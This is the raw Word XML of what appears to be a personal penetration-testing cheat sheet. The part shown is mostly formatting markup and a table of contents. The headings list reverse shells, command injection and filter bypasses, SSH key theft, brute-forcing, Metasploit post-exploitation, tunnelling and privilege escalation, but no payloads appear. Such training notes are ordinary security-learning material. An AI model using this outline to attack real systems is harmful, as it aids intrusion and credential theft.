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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6c77uh9qnja5" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookie-editor</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="1044099" cy="381842"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="357" name="image358.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image358.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1044099" cy="381842"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="243"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wappalyzer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="685800" cy="561975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="289" name="image291.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image291.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="68580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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oul28sbxvwnn" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents:</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sdt>
      <w:sdtPr>
        <w:id w:val="304360446"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique w:val="1"/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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6c77uh9qnj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Extensions</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</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ul28sbxvwn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Table of Contents:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</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t8x31ewoxa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Important</w:t>
              <w:tab/>
              <w:t xml:space="preserve">15</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0iyvt7nyd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Default Credentials</w:t>
              <w:tab/>
              <w:t xml:space="preserve">16</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lcyhht2z5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get a more stable connection after getting reverse shell</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z9piaqe9pj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pip install</w:t>
              <w:tab/>
              <w:t xml:space="preserve">17</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8ax56qcj64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rlwrap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">18</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mx49toal5y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AutoRecon</w:t>
              <w:tab/>
              <w:t xml:space="preserve">19</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ypauk9xvt29">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXXXXXXX</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_jypauk9xvt2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-Scripts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">21</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d2ff67gc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CMSmap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23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iu7d2yh14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Apache</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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624e89ok2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the root directory of Apache (Apache root) (so you know where to put rev shells)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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3hzroo152g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Web</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24</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ib9mi4bz23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Bruteforce website login using Burpsuite</w:t>
              <w:tab/>
              <w:t xml:space="preserve">26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7vrd545o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tell if a site is wordpress</w:t>
              <w:tab/>
              <w:t xml:space="preserve">27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8ymg922qp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Parse User Agents</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28</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pcsguhzxf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 Requests</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28</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gv2zgxoj5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Default Pages (how to find domain names)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28</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0a72mxcy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Bypass/Avoid Redirection using Burpsuite</w:t>
              <w:tab/>
              <w:t xml:space="preserve">28</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s0mt52z5h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Interesting web attack vector with changing request type, and adding headers</w:t>
              <w:tab/>
              <w:t xml:space="preserve">29</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a9voelx4qw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API endpoints in website URL</w:t>
              <w:tab/>
              <w:t xml:space="preserve">29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0qumhrch80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pretend to be another IP when viewing pages (IP Spoofing) using X-Forwarded-For</w:t>
              <w:tab/>
              <w:t xml:space="preserve">30</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padhrxm038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view pages as a search engine</w:t>
              <w:tab/>
              <w:t xml:space="preserve">31</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q1r15tr2i3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Burpsuite</w:t>
              <w:tab/>
              <w:t xml:space="preserve">32</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jh21fgl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automate adding HTTP headers on Burpsuite</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ctoh0dtqc1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PHP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">33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h38rpx0w5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strcmp() bypass with PHP Type Juggling</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4melwu1cnq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PHP Wrappers (from </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_e4melwu1cnq2">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXXXXXXX</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_e4melwu1cnq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 9.2.2. PHP Wrappers)</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ii481iii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root directory in PHP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">39</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actotiz4t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phpinfo.php</w:t>
              <w:tab/>
              <w:t xml:space="preserve">40</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llwyc71z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Reading PHP source code to understand how file upload works</w:t>
              <w:tab/>
              <w:t xml:space="preserve">43</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mbpedlpt1b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phpMyAdmin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">43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r920uvug7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reverse shell from phpMyAdmin:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">43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v1z0dhcqs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45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746dlmg9p9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Firefox and .mozilla (and firefox_decrypt)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">46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stzwrn7ndb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Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48</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rsarjvcr7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Basics</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48</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r1y9tjoi2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 Spaces</w:t>
              <w:tab/>
              <w:t xml:space="preserve">49</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xoj8lcjzw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Miscellaneous</w:t>
              <w:tab/>
              <w:t xml:space="preserve">50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oau08fuka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Meterpreter and Staged Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">50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3667ew8tz6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Core Meterpreter Post-Exploitation Features</w:t>
              <w:tab/>
              <w:t xml:space="preserve">51</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2kzg1h8oew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Post-Exploitation Modules</w:t>
              <w:tab/>
              <w:t xml:space="preserve">55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y7a9yveem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Pivoting with Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">64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9nxvtzuh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Msfvenom</w:t>
              <w:tab/>
              <w:t xml:space="preserve">72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unai5ar3d2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Non-staged msfvenom payload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">72</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f1nndub19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Staged msfvenom payload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">73</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fja1c96nl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Automating Metasploit using Resource Scripts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">76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86gzo3x9n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Jobs and Sessions:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">79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ta5x79p15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upgrade from a weak shell to a meterpreter:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">80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s5q41horn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Temporary shell in Meterpreter (Channels)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">81</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rxpg6ma4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interact with local files while using Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">82</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30go0vwru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Staged vs. Non-Staged Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">82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ikcrp3udw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upload .rb modules to Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">83</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h27emg69e2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Building intuition for knowing when to use tunneling/pivots</w:t>
              <w:tab/>
              <w:t xml:space="preserve">84</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0drml7b0et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Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">84</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mr4ia63ojr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Quick Guide:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">85</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txh7fm0v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 Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">85</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gwilwxd1wm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Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">86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8jswm9p09m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set up VPN-like Experience</w:t>
              <w:tab/>
              <w:t xml:space="preserve">88</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iv5gbjw9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local port forward (access target machine as local host)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">89</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u4sy8r1u3u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NMAP in Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">90</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9et81mio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 forward from pivot to Kali</w:t>
              <w:tab/>
              <w:t xml:space="preserve">90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yjb9otocbo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Transfer with Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">91</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xjlabd7c8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Ligolo-NG</w:t>
              <w:tab/>
              <w:t xml:space="preserve">91</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0egpwpdq1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delete Ligolo TUN interface for a complete reset</w:t>
              <w:tab/>
              <w:t xml:space="preserve">92</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887gbooaan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Port Redirection &amp; Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">93</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st28pb9g25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Port Forwarding with Socat</w:t>
              <w:tab/>
              <w:t xml:space="preserve">93</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au8ewq6h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Socat</w:t>
              <w:tab/>
              <w:t xml:space="preserve">95</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vwchxwoxy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Starting a new socat port forward</w:t>
              <w:tab/>
              <w:t xml:space="preserve">97</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kod8pboxmq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Port Forwarding vs. Socat Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">98</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edurrac5ch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Local Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">98</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vnj0b684j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Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">100</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pj5kd8mcc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 Port Forwarding using SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">102</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a7gcji5lwn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Dynamic Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">104</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9cp9ylzd0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Dynamic Port Forwarding with SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">105</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46mrp99xz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Proxychains</w:t>
              <w:tab/>
              <w:t xml:space="preserve">106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r6cpmccgvk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Remote Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">109</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vrn4ne0f7y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 Remote Dynamic Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">112</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nltbfc7tz5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sshuttle</w:t>
              <w:tab/>
              <w:t xml:space="preserve">115</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78x9zxnt8r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Port Forwarding with Windows Tools</w:t>
              <w:tab/>
              <w:t xml:space="preserve">117</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driqwbpvfv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Set up SOCKS5 Proxy to access internal network</w:t>
              <w:tab/>
              <w:t xml:space="preserve">117</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xkjph5mq54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SOCKS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">120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3p35m1x7cm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download Chisel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">121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o4628n3cjx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HTTP Tunneling using Chisel (Reverse Single Port Forwarding) (windows)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">121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atwn0iq8hw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HTTP Tunneling using Chisel (Reverse Dynamic Port Forwarding)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">123</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qd9aoud521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Chisel to our Kali and CONFLUENCE01</w:t>
              <w:tab/>
              <w:t xml:space="preserve">126</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kh9cv7ts8c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Chisel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">126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fxwknx216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debug Chisel problems</w:t>
              <w:tab/>
              <w:t xml:space="preserve">130</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a7s5dvitpq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HTTP Tunneling using Chisel (Local Port forwarding)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">135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p5psgtqd0m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HTTP Tunneling using Chisel (Dynamic Port forwarding)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">137</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s51w6jlo0l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Tunneling using Chisel</w:t>
              <w:tab/>
              <w:t xml:space="preserve">139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wy2qvximtw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Tunneling vs. SOCKS proxy</w:t>
              <w:tab/>
              <w:t xml:space="preserve">142</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ig1hqsh0qm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DNS Tunneling with dnscat2</w:t>
              <w:tab/>
              <w:t xml:space="preserve">143</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ccsnocegsk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Pivoting with Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">144</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4gxdy7saj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Route Add</w:t>
              <w:tab/>
              <w:t xml:space="preserve">145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nzbishiej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multi/manage/autoroute</w:t>
              <w:tab/>
              <w:t xml:space="preserve">147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h6gn0ayqp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SOCKS proxy in Metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">149</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rk2xflvtao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Port forwarding inside of metasploit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">151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zzf34ypnik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SCP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">153</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lo8wd2tf9h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SSH</w:t>
              <w:tab/>
              <w:t xml:space="preserve">154</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73cxcoaw9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Finding SSH version exploits</w:t>
              <w:tab/>
              <w:t xml:space="preserve">156</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nv3kfjh141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Linux version (of target machine) based on SSH version info</w:t>
              <w:tab/>
              <w:t xml:space="preserve">156</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itt1f6zr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Decrypting SSH Key</w:t>
              <w:tab/>
              <w:t xml:space="preserve">157</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g9acb7v6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Public and Private keys</w:t>
              <w:tab/>
              <w:t xml:space="preserve">157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fxs368ef7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turn on SSH if it's not on (how to open SSH)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">157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qjundbomk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SSH public key injection attack via authorized_keys file</w:t>
              <w:tab/>
              <w:t xml:space="preserve">158</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p6e3saqpb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authorized_keys</w:t>
              <w:tab/>
              <w:t xml:space="preserve">159</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vfgq5vqno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Bruteforce SSH with username and password list</w:t>
              <w:tab/>
              <w:t xml:space="preserve">161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73ufmbqg9a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Local Port Forwarding</w:t>
              <w:tab/>
              <w:t xml:space="preserve">161</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68uen423kh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Stealing SSH keys</w:t>
              <w:tab/>
              <w:t xml:space="preserve">162</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zsyrftvgg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Stealing SSH keys via LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">163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f3ye7obe2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Stealing SSH Keys that have passphrases and cracking them</w:t>
              <w:tab/>
              <w:t xml:space="preserve">165</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tt9fpevndk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Overwriting authorized_keys file using file upload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">167</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4pf4ywjliw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tcpdump</w:t>
              <w:tab/>
              <w:t xml:space="preserve">172</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8m31gv10nm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send pings to Kali from target machine to check if you have command execution blindly (using tcpdump)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">173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6fjrw8402i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Command Injections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">174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ii98c6883y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the ; (semicolon) for command injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">174</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xjb5ayfza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the | (pipe) for command injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">175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hl7axrvhv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Base64 encoding reverse shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">176</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16r9vjqd4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command injections to try:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">177</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81p9eb4bd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(BLIND) Command Injection for downloading photos:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">177</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486an83jfcw">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to bypass command injection filters</w:t>
              <w:tab/>
              <w:t xml:space="preserve">180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7ck8gjg520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Reverse Shell Types Explained</w:t>
              <w:tab/>
              <w:t xml:space="preserve">187</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74qrsqbsv9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Busybox</w:t>
              <w:tab/>
              <w:t xml:space="preserve">188</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2ldiuvu0u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upload and execute reverse shell upload.php and run.php (Staged Reverse Shell via Web Execution)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">189</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txerge15su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run.php looks like for non .exe payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">191</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kg721mpt8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upload.php looks like for non-php languages</w:t>
              <w:tab/>
              <w:t xml:space="preserve">193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irri5uxldv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Getting a Reverse Shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">194</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q0bjiuyhp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MSFVENOM linux reverse shell:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">194</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u46e05hhb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via arbitrary code execution</w:t>
              <w:tab/>
              <w:t xml:space="preserve">196</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zko0tlv478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Upgrading Reverse Shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">198</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skxaui205k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Uploading reverse shells and webshells to websites</w:t>
              <w:tab/>
              <w:t xml:space="preserve">201</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ssmu0tedue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bypass extension restrictions for file upload (including rev shell) on Apache by using .htaccess</w:t>
              <w:tab/>
              <w:t xml:space="preserve">204</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z2o5der4e9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Uploading reverse shell as an image using GIF signature</w:t>
              <w:tab/>
              <w:t xml:space="preserve">206</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gxvond7ssq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Upgrading webshell to reverse shell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">207</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p11qe6wm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nc</w:t>
              <w:tab/>
              <w:t xml:space="preserve">207</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ket63w5ce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python</w:t>
              <w:tab/>
              <w:t xml:space="preserve">208</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vn69iwdc2u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Encoding Reverse Shells in Base64 for powershell</w:t>
              <w:tab/>
              <w:t xml:space="preserve">208</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qbembl8m9b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Brute force login page using WFuzz</w:t>
              <w:tab/>
              <w:t xml:space="preserve">210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6f5caykkl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FFUF</w:t>
              <w:tab/>
              <w:t xml:space="preserve">211</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5ss2gd4v9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URL Fuzzing (finding URL paths):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">212</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gnwmru2lc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Parameter fuzzing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">213</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78lk212ch8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Subdomain/virtual host fuzzing (finding subdomains):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">214</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hl5szp89es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virtual hosting (which is most cases, cuz we have a target IP):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">215</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w1e3xjxeas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Dirsearch</w:t>
              <w:tab/>
              <w:t xml:space="preserve">217</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wqdq3sq3vb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DirBuster</w:t>
              <w:tab/>
              <w:t xml:space="preserve">218</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a7q5gchwzr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GoBuster</w:t>
              <w:tab/>
              <w:t xml:space="preserve">219</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zod8yv3eht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Netcat (nc)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">219</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w65w3ow6in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Telnet</w:t>
              <w:tab/>
              <w:t xml:space="preserve">221</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vdihaxkumw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Nikito</w:t>
              <w:tab/>
              <w:t xml:space="preserve">222</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l12rzc7gdh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Hydra</w:t>
              <w:tab/>
              <w:t xml:space="preserve">222</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clcoxkga8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Bruteforce Websites using Hydra</w:t>
              <w:tab/>
              <w:t xml:space="preserve">223</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v4rbrfoa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Password lists</w:t>
              <w:tab/>
              <w:t xml:space="preserve">226</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odnmqkh3o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common Hydra services</w:t>
              <w:tab/>
              <w:t xml:space="preserve">227</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z8aqcxmhn1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Wordlists</w:t>
              <w:tab/>
              <w:t xml:space="preserve">228</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1ekjdjuwk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cewl</w:t>
              <w:tab/>
              <w:t xml:space="preserve">228</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4px4ue38au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cupp</w:t>
              <w:tab/>
              <w:t xml:space="preserve">229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6q9tbs19i7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SMB (the AD cheatsheet is more updated for SMB)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">230</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m346waqv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Enumerate SMB using nxc (Net Exec)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">230</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y1wyz9qobu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users in SMB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">231</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dzst5ykc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bruteforce enumeration with a username list:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">232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huge4ebgl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bruteforce enumeration with a username list and password list:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">233</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v19srmv7o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Enumerate SMB using nmap</w:t>
              <w:tab/>
              <w:t xml:space="preserve">233</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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3fhc19e4hn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FTP</w:t>
              <w:tab/>
              <w:t xml:space="preserve">235</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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by2ogfu67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mount FTP Server</w:t>
              <w:tab/>
              <w:t xml:space="preserve">236</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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x59wzt5px8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Bruteforce default creds (without any previous info)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">237</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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zquv4559ud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Passive Mode</w:t>
              <w:tab/>
              <w:t xml:space="preserve">238</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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x9mkcc9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reverse shell to FTP, and then accessing it through a website</w:t>
              <w:tab/>
              <w:t xml:space="preserve">238</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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yzv6k9kfqu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/var/ftp write permissions leading to reverse shell (putting in reverse shell to ftp)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">241</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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5tst6vkrca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files in Linux</w:t>
              <w:tab/>
              <w:t xml:space="preserve">242</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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czmvlevqpt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grep</w:t>
              <w:tab/>
              <w:t xml:space="preserve">243</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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2u8xja1rre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Automated Privilege Escalation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">245</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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6f8soyano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Linux-exploit-suggester</w:t>
              <w:tab/>
              <w:t xml:space="preserve">245</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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mzzsmbhh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unix-privesc-check</w:t>
              <w:tab/>
              <w:t xml:space="preserve">245</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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9k2mc1txxl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LinPEAS</w:t>
              <w:tab/>
              <w:t xml:space="preserve">247</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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fy35hfito8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save linPEAS output to sublime text with color</w:t>
              <w:tab/>
              <w:t xml:space="preserve">247</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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fof8uh6gx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Extracting important information</w:t>
              <w:tab/>
              <w:t xml:space="preserve">249</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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771kll5abk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Linux Smart Enumeration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">253</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
